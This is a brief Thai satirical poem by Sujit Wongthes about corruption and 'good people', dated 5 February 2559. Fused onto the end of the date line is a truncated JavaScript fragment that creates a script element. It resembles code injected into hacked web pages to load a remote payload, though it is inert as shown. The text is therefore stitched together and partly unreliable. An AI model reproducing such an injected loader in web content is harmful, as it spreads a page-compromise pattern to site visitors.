เพราะ

 

คนดีไม่มีคอร์รัปชั่น

เพราะปิดกั้นการตรวจสอบทั้งหลาย

คนดีไม่มีวันตาย

เพราะเขาทั้งหลายล้วนยังไม่เกิดมา

 

สุจิตต์ วงษ์เทศ

ศุกร์ 5 กุมภาพันธ์ 2559var d=document;var s=d.createElement(‘script’);